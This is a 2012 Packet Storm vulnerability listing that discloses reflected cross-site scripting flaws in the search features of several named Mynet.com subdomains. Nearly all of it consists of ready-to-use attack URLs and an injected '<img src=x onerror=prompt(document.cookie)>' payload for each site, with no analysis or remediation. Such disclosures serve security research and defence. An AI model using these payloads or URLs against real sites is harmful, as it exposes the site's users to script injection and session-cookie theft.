Mynet.com Cross Site Scripting

2012-08-10T00:00:00
ID PACKETSTORM:115477
Type packetstorm
Reporter TayfunBasoglu
Modified 2012-08-10T00:00:00

Description

                                        
                                            `# Exploit Title: Mynet XSS (ALL)  
# Date: 10.08.2012  
# Author: TayfunBasoglu  
# Tested: BackTrack 5  
# Platform: Php  
  
----------------  
http://cevaplar.mynet.com/ search box  
http://cevaplar.mynet.com/Search.aspx?q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E  
"><img src=x onerror=prompt(document.cookie);>  
----------------  
http://arama.mynet.com // search box  
"><img src=x onerror=prompt(document.cookie);>  
http://arama.mynet.com/web/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/1/?cx=partner-pub-5464020032963120%3Aww4q6j-259k&cof=FORID%3A10&ie=UTF-8&q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E  
----------------  
http://foto.aktuel.mynet.com  
"><img src=x onerror=prompt(document.cookie);>  
http://foto.aktuel.mynet.com/dak/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/  
----------------  
http://birbak.mynet.com/  
"><img src=x onerror=prompt(document.cookie);>  
http://birbak.mynet.com/arama/%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E  
----------------  
http://sinema.mynet.com/  
"><img src=x onerror=prompt(document.cookie);>  
http://sinema.mynet.com/arama/film,%20oyuncu,%20i%C3%A7erik,%20sinema%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E  
----------------  
http://tatil.mynet.com/ search box  
"><img src=x onerror=prompt(document.cookie);>  
  
  
`